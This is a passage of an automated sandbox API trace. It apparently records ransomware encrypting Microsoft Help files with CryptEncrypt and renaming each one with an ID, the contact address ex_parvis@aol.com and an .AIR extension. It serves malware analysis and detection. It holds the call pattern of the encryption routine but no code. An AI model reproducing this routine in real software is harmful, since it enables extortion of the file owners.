lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=326) returned 1 [0161.332] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x146 [0161.332] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.332] GetProcessHeap () returned 0x2e0000 [0161.332] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.332] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.333] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.334] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.334] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.335] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.335] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.335] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.335] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.335] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.335] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.335] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 57 [0161.335] GetProcessHeap () returned 0x2e0000 [0161.335] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x319d30 [0161.335] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" [0161.335] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.336] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.338] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.338] GetProcessHeap () returned 0x2e0000 [0161.338] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.338] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=338) returned 1 [0161.338] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x152 [0161.338] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.338] GetProcessHeap () returned 0x2e0000 [0161.338] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.338] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.339] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.339] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.340] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.340] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.340] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.340] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.340] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.340] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.340] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.341] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 62 [0161.341] GetProcessHeap () returned 0x2e0000 [0161.341] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe2) returned 0x3a7428 [0161.341] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" [0161.341] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.341] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.343] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.343] GetProcessHeap () returned 0x2e0000 [0161.343] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.343] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=368) returned 1 [0161.343] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x170 [0161.343] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.343] GetProcessHeap () returned 0x2e0000 [0161.343] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.343] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.344] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.344] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.344] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.345] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x170, lpOverlapped=0x0) returned 1 [0161.345] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.345] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x170, lpOverlapped=0x0) returned 1 [0161.345] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.345] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.345] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.346] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 58 [0161.346] GetProcessHeap () returned 0x2e0000 [0161.346] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3ac428 [0161.346] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" [0161.346] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.346] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.349] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.349] GetProcessHeap () returned 0x2e0000 [0161.349] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.349] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=344) returned 1 [0161.349] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x158 [0161.349] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.349] GetProcessHeap () returned 0x2e0000 [0161.349] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.349] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.349] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.350] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.350] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.350] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x158, lpOverlapped=0x0) returned 1 [0161.350] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.350] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x158, lpOverlapped=0x0) returned 1 [0161.350] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.351] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.351] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.351] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 61 [0161.351] GetProcessHeap () returned 0x2e0000 [0161.352] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x3ac428 [0161.352] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" [0161.352] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.352] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.355] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.355] GetProcessHeap () returned 0x2e0000 [0161.355] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.355] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=362) returned 1 [0161.355] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16a [0161.355] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.355] GetProcessHeap () returned 0x2e0000 [0161.355] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.355] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.355] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.356] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.356] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.357] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x16a, lpOverlapped=0x0) returned 1 [0161.357] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.357] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x16a, lpOverlapped=0x0) returned 1 [0161.357] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.357] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.357] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.357] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 57 [0161.357] GetProcessHeap () returned 0x2e0000 [0161.357] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x319d30 [0161.357] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" [0161.357] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.358] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.360] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.360] GetProcessHeap () returned 0x2e0000 [0161.360] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.360] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=338) returned 1 [0161.360] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x152 [0161.360] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.360] GetProcessHeap () returned 0x2e0000 [0161.360] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.361] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.361] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.362] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.362] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.362] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: 